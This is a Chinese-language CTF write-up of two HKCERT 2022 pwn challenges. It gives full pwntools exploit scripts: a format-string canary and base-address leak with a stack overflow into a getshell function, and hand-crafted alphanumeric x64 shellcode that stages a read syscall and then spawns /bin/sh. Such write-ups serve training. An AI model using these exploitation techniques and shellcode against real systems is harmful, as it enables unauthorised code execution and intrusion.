2022-11-13
<p>[TOC]</p>
<h1>🌓echo</h1>
<h2>🌙分析</h2>
<p>checksec检查保护</p>
<p><img src="https://pic1.imgdb.cn/item/6370b47616f2c2beb1d88caa.png" alt="" /> </p>
<p>保护全开了</p>
<p><img src="https://pic1.imgdb.cn/item/6370b52216f2c2beb1da3d57.png" alt="" /> </p>
<p>程序里包含两个漏洞,printf格式化字符串溢出和scanf的%s缓冲区溢出</p>
<p><img src="https://pic1.imgdb.cn/item/6370b60e16f2c2beb1db703e.png" alt="" /> </p>
<p>同时程序里包含直接getshell的函数</p>
<p><img src="https://pic1.imgdb.cn/item/6370b5af16f2c2beb1db0ab8.png" alt="" /> </p>
<p>但是执行的时候发现需要2.34的libc,但是我没有,只能通过盲打来进行,首先确定目标</p>
<ul>
<li>获取elf加载基地址</li>
<li>获取canary值</li>
<li>覆盖函数返回地址为getshell函数</li>
</ul>
<p>我们可以通过格式化字符串任意读来实现前两个目标</p>
<p><img src="https://pic1.imgdb.cn/item/6370b6d616f2c2beb1dc7287.png" alt="" /> </p>
<p>很容易就知道canary的值和elf中某个函数的地址,偏移量分别为19和21</p>
<p><img src="https://pic1.imgdb.cn/item/6370b74f16f2c2beb1dd389a.png" alt="" /> </p>
<p>还有要解决的就是需要覆盖全局变量can_level为非0,这里用到了格式化字符串任意写来完成,注意printf遇到“\x00”会截断,所以填写can_leave地址的时候需要后置</p>
<h2>🌙Exploit</h2>
<pre><code class="language-python">from pwn import*
# context.log_level = 'debug'
# o = process('./chall')
o = remote('chal.hkcert22.pwnable.hk', 28037)
payload = "%19$p,\x00 %21$p"
o.recvuntil('Input:')
o.sendline(payload)
o.recvuntil('0x')
canary = int(o.recv(16), 16)
o.recvuntil('0x')
elf_addr = int(o.recv(12), 16)
log.info('canary: ' + hex(canary))
log.info('elf_addr: ' + hex(elf_addr))
elf_base = elf_addr - 0x135A
getshell = elf_base + 0x1264
can = elf_base + 0x401C
payload = 'aaaa%7$n' + p64(can)
o.recvuntil('Input:')
o.sendline(payload)
payload = 'a'*104 + p64(canary) + 'a'*8 + p64(getshell)
o.recvuntil('Input:')
o.sendline(payload)
o.sendline('--')
o.interactive()
</code></pre>
<p><img src="https://pic1.imgdb.cn/item/6370c0ff16f2c2beb1eb69f7.png" alt="" /></p>
<h2>🌙附件</h2>
<p><a href="https://flowus.cn/c3n1g/share/1c3e32e7-5d64-42cb-9956-3bbf5b5d0e78">https://flowus.cn/c3n1g/share/1c3e32e7-5d64-42cb-9956-3bbf5b5d0e78</a>
【FlowUs 息流】echo.zip</p>
<h1>🌓shellcode-runner2</h1>
<h2>🌙分析</h2>
<p><img src="https://pic1.imgdb.cn/item/6370b9ee16f2c2beb1e11103.png" alt="" /> </p>
<p>题目是shellcode注入,但是限制shellcode必须是大写字母和数字,如果是x86程序可以直接用alpha3来生成,但是这是x64程序,需要手动来写shellcode</p>
<p>跳转去执行shellcode时寄存器值为</p>
<p><img src="https://pic1.imgdb.cn/item/6370bd9116f2c2beb1e55d44.png" alt="" /> </p>
<p>我个人的想法是实现read系统调用,只需要将rdi置0,rsi不变,rdx只要是一个大数字就行,如果要实现execve(“/bin/sh”, 0, 0)比较前者要难一点,不如用read覆写shellcode,这样写入的shellcode没有任何限制</p>
<p>read系统调用实现</p>
<pre><code>push rax
pop rcx # 将shellcode地址存储到rcx中
push rsi
push rsp
pop rax
xor DWORD PTR [rax], esi
pop rax # 将rax清零
xor al, 0x39
xor al, 0x36
push rax
pop rdx # 产生0xf存储到rdx中
push rsi
push rsp
pop rax
xor DWORD PTR [rax], esi
pop rax # rax清零
xor DWORD PTR [rcx+rax*2+0x30], edx # 写入shellcode+0x30处为0xf
xor al, 0x36
xor al, 0x33
push rax
pop rdx # 产生0x5存储到rdx中
push rsi
push rsp
pop rax
xor DWORD PTR [rax], esi
pop rax # rax清零
xor DWORD PTR [rcx+rax*2+0x31], edx # 写入shellcode+0x31处为0x5,最终和0x30处形成指令syscall
push rcx
pop rcx
push rcx
pop rcx
push rcx
pop rcx
push rcx
pop rdx # 填充数据,让其执行到shellcode+0x30处
</code></pre>
<p>最后对应寄存器的值为rax=0,rdi=0,rsi=shellcode,rdx=shellcode</p>
<p>再次写入普通shellcode就行,记得前面填充多个nop指令</p>
<h2>🌙Exploit</h2>
<pre><code class="language-python">from pwn import *
context.arch = 'amd64'
# o = process('./chall')
o = remote('chal.hkcert22.pwnable.hk', 28130)
shellcode = '''
push rax
pop rcx
push rsi
push rsp
pop rax
xor DWORD PTR [rax], esi
pop rax
xor al, 0x39
xor al, 0x36
push rax
pop rdx
push rsi
push rsp
pop rax
xor DWORD PTR [rax], esi
pop rax
xor DWORD PTR [rcx+rax*2+0x30], edx
xor al, 0x36
xor al, 0x33
push rax
pop rdx
push rsi
push rsp
pop rax
xor DWORD PTR [rax], esi
pop rax
xor DWORD PTR [rcx+rax*2+0x31], edx
push rcx
pop rcx
push rcx
pop rcx
push rcx
pop rcx
push rcx
pop rdx
'''
shellcode = asm(shellcode)
print shellcode
o.sendline(shellcode)
payload = asm('nop')*0x50 + asm(shellcraft.sh())
o.sendline(payload)
o.interactive()
</code></pre>
<p><img src="https://pic1.imgdb.cn/item/6370be2916f2c2beb1e6284d.png" alt="" /></p>
<h2>🌙附件</h2>
<p><a href="https://flowus.cn/c3n1g/share/8d93197a-8ff0-481c-bb50-1f45aeefcd6d">https://flowus.cn/c3n1g/share/8d93197a-8ff0-481c-bb50-1f45aeefcd6d</a>
【FlowUs 息流】shellcode-runner2.zip</p>